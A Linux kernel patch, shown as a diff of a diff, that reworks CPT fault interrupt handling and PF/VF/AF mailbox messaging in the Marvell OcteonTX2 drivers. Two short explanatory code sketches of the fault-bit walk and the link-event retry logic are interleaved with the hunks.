+-	if (!is_rvu_otx2(rvu)) {
+-		reg2 = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(2));
+-		dev_err_ratelimited(rvu->dev,
+-				    "Received CPTAF FLT irq : 0x%llx, 0x%llx, 0x%llx",
+-				     reg0, reg1, reg2);
+-	} else {
+-		dev_err_ratelimited(rvu->dev,
+-				    "Received CPTAF FLT irq : 0x%llx, 0x%llx",
+-				     reg0, reg1);
++	u64 reg, val;
++	int i, eng;
++	u8 grp;
++
++	reg = rvu_read64(rvu, blkaddr, CPT_AF_FLTX_INT(vec));
++	dev_err_ratelimited(rvu->dev, "Received CPTAF FLT%d irq : 0x%llx", vec, reg);
++
++	i = -1;
++	while ((i = find_next_bit((unsigned long *)&reg, 64, i + 1)) < 64) {
++		switch (vec) {
++		case 0:
++			eng = i;
++			break;
++		case 1:
++			eng = i + 64;
++			break;
++		case 2:
++			eng = i + 128;
++			break;
++		}
++		grp = rvu_read64(rvu, blkaddr, CPT_AF_EXEX_CTL2(eng)) & 0xFF;
++		/* Disable and enable the engine which triggers fault */
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL2(eng), 0x0);
++		val = rvu_read64(rvu, blkaddr, CPT_AF_EXEX_CTL(eng));
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL(eng), val & ~1ULL);
++
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL2(eng), grp);
++		rvu_write64(rvu, blkaddr, CPT_AF_EXEX_CTL(eng), val | 1ULL);
++
++		spin_lock(&rvu->cpt_intr_lock);
++		block->cpt_flt_eng_map[vec] |= BIT_ULL(i);
++		val = rvu_read64(rvu, blkaddr, CPT_AF_EXEX_STS(eng));
++		val = val & 0x3;
++		if (val == 0x1 || val == 0x2)
++			block->cpt_rcvrd_eng_map[vec] |= BIT_ULL(i);
++		spin_unlock(&rvu->cpt_intr_lock);
+ 	}
+-
+-	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(0), reg0);
+-	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(1), reg1);
+-	if (!is_rvu_otx2(rvu))
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(2), reg2);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT(vec), reg);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
++static irqreturn_t rvu_cpt_af_flt0_intr_handler(int irq, void *ptr)
++{
++	return cpt_af_flt_intr_handler(CPT_AF_INT_VEC_FLT0, ptr);
++}
++
++static irqreturn_t rvu_cpt_af_flt1_intr_handler(int irq, void *ptr)
++{
++	return cpt_af_flt_intr_handler(CPT_AF_INT_VEC_FLT1, ptr);
++}
++
++static irqreturn_t rvu_cpt_af_flt2_intr_handler(int irq, void *ptr)
++{
++	return cpt_af_flt_intr_handler(CPT_10K_AF_INT_VEC_FLT2, ptr);
++}
++
+ static irqreturn_t rvu_cpt_af_rvu_intr_handler(int irq, void *ptr)
+ {
+ 	struct rvu_block *block = ptr;
+@@ -119,8 +153,10 @@ static void cpt_10k_unregister_interrupts(struct rvu_block *block, int off)
+ 	int i;
+ 
+ 	/* Disable all CPT AF interrupts */
+-	for (i = 0; i < CPT_10K_AF_INT_VEC_RVU; i++)
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(i), 0x1);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(0), ~0ULL);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(1), ~0ULL);
++	rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(2), 0xFFFF);
++
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RVU_INT_ENA_W1C, 0x1);
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RAS_INT_ENA_W1C, 0x1);
+ 
+@@ -151,7 +187,7 @@ static void cpt_unregister_interrupts(struct rvu *rvu, int blkaddr)
+ 
+ 	/* Disable all CPT AF interrupts */
+ 	for (i = 0; i < CPT_AF_INT_VEC_RVU; i++)
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(i), 0x1);
++		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1C(i), ~0ULL);
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RVU_INT_ENA_W1C, 0x1);
+ 	rvu_write64(rvu, blkaddr, CPT_AF_RAS_INT_ENA_W1C, 0x1);
+ 
+@@ -172,16 +208,31 @@ static int cpt_10k_register_interrupts(struct rvu_block *block, int off)
+ {
+ 	struct rvu *rvu = block->rvu;
+ 	int blkaddr = block->addr;
++	irq_handler_t flt_fn;
+ 	int i, ret;
+ 
+ 	for (i = CPT_10K_AF_INT_VEC_FLT0; i < CPT_10K_AF_INT_VEC_RVU; i++) {
+ 		sprintf(&rvu->irq_name[(off + i) * NAME_SIZE], "CPTAF FLT%d", i);
++
++		switch (i) {
++		case CPT_10K_AF_INT_VEC_FLT0:
++			flt_fn = rvu_cpt_af_flt0_intr_handler;
++			break;
++		case CPT_10K_AF_INT_VEC_FLT1:
++			flt_fn = rvu_cpt_af_flt1_intr_handler;
++			break;
++		case CPT_10K_AF_INT_VEC_FLT2:
++			flt_fn = rvu_cpt_af_flt2_intr_handler;
++			break;
++		}
+ 		ret = rvu_cpt_do_register_interrupt(block, off + i,
+-						    rvu_cpt_af_flt_intr_handler,
+-						    &rvu->irq_name[(off + i) * NAME_SIZE]);
++						    flt_fn, &rvu->irq_name[(off + i) * NAME_SIZE]);
+ 		if (ret)
+ 			goto err;
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), 0x1);
++		if (i == CPT_10K_AF_INT_VEC_FLT2)
++			rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), 0xFFFF);
++		else
++			rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), ~0ULL);
+ 	}
+ 
+ 	ret = rvu_cpt_do_register_interrupt(block, off + CPT_10K_AF_INT_VEC_RVU,
+@@ -208,8 +259,8 @@ static int cpt_register_interrupts(struct rvu *rvu, int blkaddr)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	struct rvu_block *block;
++	irq_handler_t flt_fn;
+ 	int i, offs, ret = 0;
+-	char irq_name[16];
+ 
+ 	if (!is_block_implemented(rvu->hw, blkaddr))
+ 		return 0;
+@@ -226,13 +277,20 @@ static int cpt_register_interrupts(struct rvu *rvu, int blkaddr)
+ 		return cpt_10k_register_interrupts(block, offs);
+ 
+ 	for (i = CPT_AF_INT_VEC_FLT0; i < CPT_AF_INT_VEC_RVU; i++) {
+-		snprintf(irq_name, sizeof(irq_name), "CPTAF FLT%d", i);
++		sprintf(&rvu->irq_name[(offs + i) * NAME_SIZE], "CPTAF FLT%d", i);
++		switch (i) {
++		case CPT_AF_INT_VEC_FLT0:
++			flt_fn = rvu_cpt_af_flt0_intr_handler;
++			break;
++		case CPT_AF_INT_VEC_FLT1:
++			flt_fn = rvu_cpt_af_flt1_intr_handler;
++			break;
++		}
+ 		ret = rvu_cpt_do_register_interrupt(block, offs + i,
+-						    rvu_cpt_af_flt_intr_handler,
+-						    irq_name);
++						    flt_fn, &rvu->irq_name[(offs + i) * NAME_SIZE]);
+ 		if (ret)
+ 			goto err;
+-		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), 0x1);
++		rvu_write64(rvu, blkaddr, CPT_AF_FLTX_INT_ENA_W1S(i), ~0ULL);
+ 	}
+ 
+ 	ret = rvu_cpt_do_register_interrupt(block, offs + CPT_AF_INT_VEC_RVU,
+@@ -290,7 +348,7 @@ static int get_cpt_pf_num(struct rvu *rvu)
+ 
+ static bool is_cpt_pf(struct rvu *rvu, u16 pcifunc)
+ {
+-	int cpt_pf_num = get_cpt_pf_num(rvu);
++	int cpt_pf_num = rvu->cpt_pf_num;
+ 
+ 	if (rvu_get_pf(pcifunc) != cpt_pf_num)
+ 		return false;
+@@ -302,7 +360,7 @@ static bool is_cpt_pf(struct rvu *rvu, u16 pcifunc)
+ 
+ static bool is_cpt_vf(struct rvu *rvu, u16 pcifunc)
+ {
+-	int cpt_pf_num = get_cpt_pf_num(rvu);
++	int cpt_pf_num = rvu->cpt_pf_num;
+ 
+ 	if (rvu_get_pf(pcifunc) != cpt_pf_num)
+ 		return false;
+@@ -801,6 +859,64 @@ int rvu_mbox_handler_cpt_ctx_cache_sync(struct rvu *rvu, struct msg_req *req,
+ 	return rvu_cpt_ctx_flush(rvu, req->hdr.pcifunc);
+ }
+ 
++int rvu_mbox_handler_cpt_lf_reset(struct rvu *rvu, struct cpt_lf_rst_req *req,
++				  struct msg_rsp *rsp)
++{
++	u16 pcifunc = req->hdr.pcifunc;
++	struct rvu_block *block;
++	int cptlf, blkaddr, ret;
++	u16 actual_slot;
++	u64 ctl, ctl2;
++
++	blkaddr = rvu_get_blkaddr_from_slot(rvu, BLKTYPE_CPT, pcifunc,
++					    req->slot, &actual_slot);
++	if (blkaddr < 0)
++		return CPT_AF_ERR_LF_INVALID;
++
++	block = &rvu->hw->block[blkaddr];
++
++	cptlf = rvu_get_lf(rvu, block, pcifunc, actual_slot);
++	if (cptlf < 0)
++		return CPT_AF_ERR_LF_INVALID;
++	ctl = rvu_read64(rvu, blkaddr, CPT_AF_LFX_CTL(cptlf));
++	ctl2 = rvu_read64(rvu, blkaddr, CPT_AF_LFX_CTL2(cptlf));
++
++	ret = rvu_lf_reset(rvu, block, cptlf);
++	if (ret)
++		dev_err(rvu->dev, "Failed to reset blkaddr %d LF%d\n",
++			block->addr, cptlf);
++
++	rvu_write64(rvu, blkaddr, CPT_AF_LFX_CTL(cptlf), ctl);
++	rvu_write64(rvu, blkaddr, CPT_AF_LFX_CTL2(cptlf), ctl2);
++
++	return 0;
++}
++
++int rvu_mbox_handler_cpt_flt_eng_info(struct rvu *rvu, struct cpt_flt_eng_info_req *req,
++				      struct cpt_flt_eng_info_rsp *rsp)
++{
++	struct rvu_block *block;
++	unsigned long flags;
++	int blkaddr, vec;
++
++	blkaddr = validate_and_get_cpt_blkaddr(req->blkaddr);
++	if (blkaddr < 0)
++		return blkaddr;
++
++	block = &rvu->hw->block[blkaddr];
++	for (vec = 0; vec < CPT_10K_AF_INT_VEC_RVU; vec++) {
++		spin_lock_irqsave(&rvu->cpt_intr_lock, flags);
++		rsp->flt_eng_map[vec] = block->cpt_flt_eng_map[vec];
++		rsp->rcvrd_eng_map[vec] = block->cpt_rcvrd_eng_map[vec];
++		if (req->reset) {
++			block->cpt_flt_eng_map[vec] = 0x0;
++			block->cpt_rcvrd_eng_map[vec] = 0x0;
++		}
++		spin_unlock_irqrestore(&rvu->cpt_intr_lock, flags);
++	}
++	return 0;
++}
++
+ static void cpt_rxc_teardown(struct rvu *rvu, int blkaddr)
+ {
+ 	struct cpt_rxc_time_cfg_req req;
+@@ -940,7 +1056,7 @@ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf, int s
+ static int cpt_inline_inb_lf_cmd_send(struct rvu *rvu, int blkaddr,
+ 				      int nix_blkaddr)
+ {
+-	int cpt_pf_num = get_cpt_pf_num(rvu);
++	int cpt_pf_num = rvu->cpt_pf_num;
+ 	struct cpt_inst_lmtst_req *req;
+ 	dma_addr_t res_daddr;
+ 	int timeout = 3000;
+@@ -1084,3 +1200,12 @@ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc)
+ 
+ 	return 0;
+ }
++
++int rvu_cpt_init(struct rvu *rvu)
++{
++	/* Retrieve CPT PF number */
++	rvu->cpt_pf_num = get_cpt_pf_num(rvu);
++	spin_lock_init(&rvu->cpt_intr_lock);
++
++	return 0;
++}
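The reworked fault handler above walks every set bit of one FLT vector
instead of dumping all three registers at once: each vector covers 64
engines (vector 2 only 16 on CN10K, hence the 0xFFFF enable mask), and the
global engine number is the bit index plus a per-vector offset. A
user-space sketch of that walk, with find_next_bit() re-derived for the
demo:

#include <stdint.h>
#include <stdio.h>

static int find_next_bit64(uint64_t word, int start)
{
	for (int i = start; i < 64; i++)
		if (word & (1ULL << i))
			return i;
	return 64;
}

int main(void)
{
	uint64_t reg = (1ULL << 3) | (1ULL << 40);	/* pretend FLT1 status */
	uint64_t flt_eng_map = 0;
	int vec = 1, i = -1;

	while ((i = find_next_bit64(reg, i + 1)) < 64) {
		int eng = i + vec * 64;	/* FLT0: +0, FLT1: +64, FLT2: +128 */

		flt_eng_map |= 1ULL << i;
		printf("fault on engine %d\n", eng);
	}
	printf("map = 0x%016llx\n", (unsigned long long)flt_eng_map);
	return 0;
}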
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 44950c2542bb7..c15d1864a6371 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -785,7 +785,7 @@ static inline int otx2_sync_mbox_up_msg(struct mbox *mbox, int devid)
+ 
+ 	if (!otx2_mbox_nonempty(&mbox->mbox_up, devid))
+ 		return 0;
+-	otx2_mbox_msg_send(&mbox->mbox_up, devid);
++	otx2_mbox_msg_send_up(&mbox->mbox_up, devid);
+ 	err = otx2_mbox_wait_for_rsp(&mbox->mbox_up, devid);
+ 	if (err)
+ 		return err;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index a2d8ac6204054..7e2c30927c312 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -272,8 +272,7 @@ static int otx2_pf_flr_init(struct otx2_nic *pf, int num_vfs)
+ {
+ 	int vf;
+ 
+-	pf->flr_wq = alloc_workqueue("otx2_pf_flr_wq",
+-				     WQ_UNBOUND | WQ_HIGHPRI, 1);
++	pf->flr_wq = alloc_ordered_workqueue("otx2_pf_flr_wq", WQ_HIGHPRI);
+ 	if (!pf->flr_wq)
+ 		return -ENOMEM;
+ 
+@@ -292,8 +291,8 @@ static int otx2_pf_flr_init(struct otx2_nic *pf, int num_vfs)
+ 	return 0;
+ }
+ 
+-static void otx2_queue_work(struct mbox *mw, struct workqueue_struct *mbox_wq,
+-			    int first, int mdevs, u64 intr, int type)
++static void otx2_queue_vf_work(struct mbox *mw, struct workqueue_struct *mbox_wq,
++			       int first, int mdevs, u64 intr)
+ {
+ 	struct otx2_mbox_dev *mdev;
+ 	struct otx2_mbox *mbox;
+@@ -307,40 +306,26 @@ static void otx2_queue_work(struct mbox *mw, struct workqueue_struct *mbox_wq,
+ 
+ 		mbox = &mw->mbox;
+ 		mdev = &mbox->dev[i];
+-		if (type == TYPE_PFAF)
+-			otx2_sync_mbox_bbuf(mbox, i);
+ 		hdr = mdev->mbase + mbox->rx_start;
+ 		/* The hdr->num_msgs is set to zero immediately in the interrupt
+-		 * handler to  ensure that it holds a correct value next time
+-		 * when the interrupt handler is called.
+-		 * pf->mbox.num_msgs holds the data for use in pfaf_mbox_handler
+-		 * pf>mbox.up_num_msgs holds the data for use in
+-		 * pfaf_mbox_up_handler.
++		 * handler to ensure that it holds a correct value next time
++		 * when the interrupt handler is called. pf->mw[i].num_msgs
++		 * holds the data for use in otx2_pfvf_mbox_handler and
++		 * pf->mw[i].up_num_msgs holds the data for use in
++		 * otx2_pfvf_mbox_up_handler.
+ 		 */
+ 		if (hdr->num_msgs) {
+ 			mw[i].num_msgs = hdr->num_msgs;
+ 			hdr->num_msgs = 0;
+-			if (type == TYPE_PFAF)
+-				memset(mbox->hwbase + mbox->rx_start, 0,
+-				       ALIGN(sizeof(struct mbox_hdr),
+-					     sizeof(u64)));
+-
+ 			queue_work(mbox_wq, &mw[i].mbox_wrk);
+ 		}
+ 
+ 		mbox = &mw->mbox_up;
+ 		mdev = &mbox->dev[i];
+-		if (type == TYPE_PFAF)
+-			otx2_sync_mbox_bbuf(mbox, i);
+ 		hdr = mdev->mbase + mbox->rx_start;
+ 		if (hdr->num_msgs) {
+ 			mw[i].up_num_msgs = hdr->num_msgs;
+ 			hdr->num_msgs = 0;
+-			if (type == TYPE_PFAF)
+-				memset(mbox->hwbase + mbox->rx_start, 0,
+-				       ALIGN(sizeof(struct mbox_hdr),
+-					     sizeof(u64)));
+-
+ 			queue_work(mbox_wq, &mw[i].mbox_up_wrk);
+ 		}
+ 	}
+@@ -356,8 +341,10 @@ static void otx2_forward_msg_pfvf(struct otx2_mbox_dev *mdev,
+ 	/* Msgs are already copied, trigger VF's mbox irq */
+ 	smp_wmb();
+ 
++	otx2_mbox_wait_for_zero(pfvf_mbox, devid);
++
+ 	offset = pfvf_mbox->trigger | (devid << pfvf_mbox->tr_shift);
+-	writeq(1, (void __iomem *)pfvf_mbox->reg_base + offset);
++	writeq(MBOX_DOWN_MSG, (void __iomem *)pfvf_mbox->reg_base + offset);
+ 
+ 	/* Restore VF's mbox bounce buffer region address */
+ 	src_mdev->mbase = bbuf_base;
+@@ -547,7 +534,7 @@ static void otx2_pfvf_mbox_up_handler(struct work_struct *work)
+ end:
+ 		offset = mbox->rx_start + msg->next_msgoff;
+ 		if (mdev->msgs_acked == (vf_mbox->up_num_msgs - 1))
+-			__otx2_mbox_reset(mbox, 0);
++			__otx2_mbox_reset(mbox, vf_idx);
+ 		mdev->msgs_acked++;
+ 	}
+ }
+@@ -564,8 +551,7 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 	if (vfs > 64) {
+ 		intr = otx2_read64(pf, RVU_PF_VFPF_MBOX_INTX(1));
+ 		otx2_write64(pf, RVU_PF_VFPF_MBOX_INTX(1), intr);
+-		otx2_queue_work(mbox, pf->mbox_pfvf_wq, 64, vfs, intr,
+-				TYPE_PFVF);
++		otx2_queue_vf_work(mbox, pf->mbox_pfvf_wq, 64, vfs, intr);
+ 		if (intr)
+ 			trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
+ 		vfs = 64;
+@@ -574,7 +560,7 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 	intr = otx2_read64(pf, RVU_PF_VFPF_MBOX_INTX(0));
+ 	otx2_write64(pf, RVU_PF_VFPF_MBOX_INTX(0), intr);
+ 
+-	otx2_queue_work(mbox, pf->mbox_pfvf_wq, 0, vfs, intr, TYPE_PFVF);
++	otx2_queue_vf_work(mbox, pf->mbox_pfvf_wq, 0, vfs, intr);
+ 
+ 	if (intr)
+ 		trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
+@@ -599,7 +585,7 @@ static int otx2_pfvf_mbox_init(struct otx2_nic *pf, int numvfs)
+ 
+ 	pf->mbox_pfvf_wq = alloc_workqueue("otx2_pfvf_mailbox",
+ 					   WQ_UNBOUND | WQ_HIGHPRI |
+-					   WQ_MEM_RECLAIM, 1);
++					   WQ_MEM_RECLAIM, 0);
+ 	if (!pf->mbox_pfvf_wq)
+ 		return -ENOMEM;
+ 
+@@ -822,20 +808,22 @@ static void otx2_pfaf_mbox_handler(struct work_struct *work)
+ 	struct mbox *af_mbox;
+ 	struct otx2_nic *pf;
+ 	int offset, id;
++	u16 num_msgs;
+ 
+ 	af_mbox = container_of(work, struct mbox, mbox_wrk);
+ 	mbox = &af_mbox->mbox;
+ 	mdev = &mbox->dev[0];
+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++	num_msgs = rsp_hdr->num_msgs;
+ 
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 	pf = af_mbox->pfvf;
+ 
+-	for (id = 0; id < af_mbox->num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 		otx2_process_pfaf_mbox_msg(pf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+-		if (mdev->msgs_acked == (af_mbox->num_msgs - 1))
++		if (mdev->msgs_acked == (num_msgs - 1))
+ 			__otx2_mbox_reset(mbox, 0);
+ 		mdev->msgs_acked++;
+ 	}
+@@ -946,12 +934,14 @@ static void otx2_pfaf_mbox_up_handler(struct work_struct *work)
+ 	int offset, id, devid = 0;
+ 	struct mbox_hdr *rsp_hdr;
+ 	struct mbox_msghdr *msg;
++	u16 num_msgs;
+ 
+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++	num_msgs = rsp_hdr->num_msgs;
+ 
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 
+-	for (id = 0; id < af_mbox->up_num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 
+ 		devid = msg->pcifunc & RVU_PFVF_FUNC_MASK;
+@@ -960,10 +950,11 @@ static void otx2_pfaf_mbox_up_handler(struct work_struct *work)
+ 			otx2_process_mbox_msg_up(pf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+ 	}
+-	if (devid) {
++	/* Forward to VF iff VFs are really present */
++	if (devid && pci_num_vf(pf->pdev)) {
+ 		otx2_forward_vf_mbox_msgs(pf, &pf->mbox.mbox_up,
+ 					  MBOX_DIR_PFVF_UP, devid - 1,
+-					  af_mbox->up_num_msgs);
++					  num_msgs);
+ 		return;
+ 	}
+ 
+@@ -973,16 +964,49 @@ static void otx2_pfaf_mbox_up_handler(struct work_struct *work)
+ static irqreturn_t otx2_pfaf_mbox_intr_handler(int irq, void *pf_irq)
+ {
+ 	struct otx2_nic *pf = (struct otx2_nic *)pf_irq;
+-	struct mbox *mbox;
++	struct mbox *mw = &pf->mbox;
++	struct otx2_mbox_dev *mdev;
++	struct otx2_mbox *mbox;
++	struct mbox_hdr *hdr;
++	u64 mbox_data;
+ 
+ 	/* Clear the IRQ */
+ 	otx2_write64(pf, RVU_PF_INT, BIT_ULL(0));
+ 
+-	mbox = &pf->mbox;
+ 
+-	trace_otx2_msg_interrupt(mbox->mbox.pdev, "AF to PF", BIT_ULL(0));
++	mbox_data = otx2_read64(pf, RVU_PF_PFAF_MBOX0);
++
++	if (mbox_data & MBOX_UP_MSG) {
++		mbox_data &= ~MBOX_UP_MSG;
++		otx2_write64(pf, RVU_PF_PFAF_MBOX0, mbox_data);
++
++		mbox = &mw->mbox_up;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
++
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(pf->mbox_wq, &mw->mbox_up_wrk);
++
++		trace_otx2_msg_interrupt(pf->pdev, "UP message from AF to PF",
++					 BIT_ULL(0));
++	}
++
++	if (mbox_data & MBOX_DOWN_MSG) {
++		mbox_data &= ~MBOX_DOWN_MSG;
++		otx2_write64(pf, RVU_PF_PFAF_MBOX0, mbox_data);
++
++		mbox = &mw->mbox;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
++
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(pf->mbox_wq, &mw->mbox_wrk);
+ 
+-	otx2_queue_work(mbox, pf->mbox_wq, 0, 1, 1, TYPE_PFAF);
++		trace_otx2_msg_interrupt(pf->pdev, "DOWN reply from AF to PF",
++					 BIT_ULL(0));
++	}
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -1063,9 +1087,8 @@ static int otx2_pfaf_mbox_init(struct otx2_nic *pf)
+ 	int err;
+ 
+ 	mbox->pfvf = pf;
+-	pf->mbox_wq = alloc_workqueue("otx2_pfaf_mailbox",
+-				      WQ_UNBOUND | WQ_HIGHPRI |
+-				      WQ_MEM_RECLAIM, 1);
++	pf->mbox_wq = alloc_ordered_workqueue("otx2_pfaf_mailbox",
++					      WQ_HIGHPRI | WQ_MEM_RECLAIM);
+ 	if (!pf->mbox_wq)
+ 		return -ENOMEM;
+ 
+@@ -3030,6 +3053,7 @@ static void otx2_vf_link_event_task(struct work_struct *work)
+ 	struct otx2_vf_config *config;
+ 	struct cgx_link_info_msg *req;
+ 	struct mbox_msghdr *msghdr;
++	struct delayed_work *dwork;
+ 	struct otx2_nic *pf;
+ 	int vf_idx;
+ 
+@@ -3038,10 +3062,24 @@ static void otx2_vf_link_event_task(struct work_struct *work)
+ 	vf_idx = config - config->pf->vf_configs;
+ 	pf = config->pf;
+ 
++	if (config->intf_down)
++		return;
++
++	mutex_lock(&pf->mbox.lock);
++
++	dwork = &config->link_event_work;
++
++	if (!otx2_mbox_wait_for_zero(&pf->mbox_pfvf[0].mbox_up, vf_idx)) {
++		schedule_delayed_work(dwork, msecs_to_jiffies(100));
++		mutex_unlock(&pf->mbox.lock);
++		return;
++	}
++
+ 	msghdr = otx2_mbox_alloc_msg_rsp(&pf->mbox_pfvf[0].mbox_up, vf_idx,
+ 					 sizeof(*req), sizeof(struct msg_rsp));
+ 	if (!msghdr) {
+ 		dev_err(pf->dev, "Failed to create VF%d link event\n", vf_idx);
++		mutex_unlock(&pf->mbox.lock);
+ 		return;
+ 	}
+ 
+@@ -3050,7 +3088,11 @@ static void otx2_vf_link_event_task(struct work_struct *work)
+ 	req->hdr.sig = OTX2_MBOX_REQ_SIG;
+ 	memcpy(&req->link_info, &pf->linfo, sizeof(req->link_info));
+ 
++	otx2_mbox_wait_for_zero(&pf->mbox_pfvf[0].mbox_up, vf_idx);
++
+ 	otx2_sync_mbox_up_msg(&pf->mbox_pfvf[0], vf_idx);
++
++	mutex_unlock(&pf->mbox.lock);
+ }
+ 
+ static int otx2_sriov_enable(struct pci_dev *pdev, int numvfs)
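The otx2_vf_link_event_task() change above adds a polite retry: if the VF
has not yet drained the previous up message, the worker backs off for
about 100 ms instead of clobbering the mailbox. A trimmed sketch of just
that retry step, using the driver's own helpers (error handling and the
message fill elided):

static void otx2_link_event_try_send(struct otx2_nic *pf, int vf_idx,
				     struct delayed_work *dwork)
{
	if (!otx2_mbox_wait_for_zero(&pf->mbox_pfvf[0].mbox_up, vf_idx)) {
		/* VF still busy with the last event; retry later */
		schedule_delayed_work(dwork, msecs_to_jiffies(100));
		return;
	}
	/* ... allocate and send the cgx_link_info_msg as in the hunk ... */
}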
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 404855bccb4b6..dcb8190de2407 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -89,16 +89,20 @@ static void otx2vf_vfaf_mbox_handler(struct work_struct *work)
+ 	struct otx2_mbox *mbox;
+ 	struct mbox *af_mbox;
+ 	int offset, id;
++	u16 num_msgs;
+ 
+ 	af_mbox = container_of(work, struct mbox, mbox_wrk);
+ 	mbox = &af_mbox->mbox;
+ 	mdev = &mbox->dev[0];
+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (af_mbox->num_msgs == 0)
++	num_msgs = rsp_hdr->num_msgs;
++
++	if (num_msgs == 0)
+ 		return;
++
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 
+-	for (id = 0; id < af_mbox->num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 		otx2vf_process_vfaf_mbox_msg(af_mbox->pfvf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+@@ -151,6 +155,7 @@ static void otx2vf_vfaf_mbox_up_handler(struct work_struct *work)
+ 	struct mbox *vf_mbox;
+ 	struct otx2_nic *vf;
+ 	int offset, id;
++	u16 num_msgs;
+ 
+ 	vf_mbox = container_of(work, struct mbox, mbox_up_wrk);
+ 	vf = vf_mbox->pfvf;
+@@ -158,12 +163,14 @@ static void otx2vf_vfaf_mbox_up_handler(struct work_struct *work)
+ 	mdev = &mbox->dev[0];
+ 
+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (vf_mbox->up_num_msgs == 0)
++	num_msgs = rsp_hdr->num_msgs;
++
++	if (num_msgs == 0)
+ 		return;
+ 
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 
+-	for (id = 0; id < vf_mbox->up_num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 		otx2vf_process_mbox_msg_up(vf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+@@ -178,40 +185,48 @@ static irqreturn_t otx2vf_vfaf_mbox_intr_handler(int irq, void *vf_irq)
+ 	struct otx2_mbox_dev *mdev;
+ 	struct otx2_mbox *mbox;
+ 	struct mbox_hdr *hdr;
++	u64 mbox_data;
+ 
+ 	/* Clear the IRQ */
+ 	otx2_write64(vf, RVU_VF_INT, BIT_ULL(0));
+ 
++	mbox_data = otx2_read64(vf, RVU_VF_VFPF_MBOX0);
++
+ 	/* Read latest mbox data */
+ 	smp_rmb();
+ 
+-	/* Check for PF => VF response messages */
+-	mbox = &vf->mbox.mbox;
+-	mdev = &mbox->dev[0];
+-	otx2_sync_mbox_bbuf(mbox, 0);
++	if (mbox_data & MBOX_DOWN_MSG) {
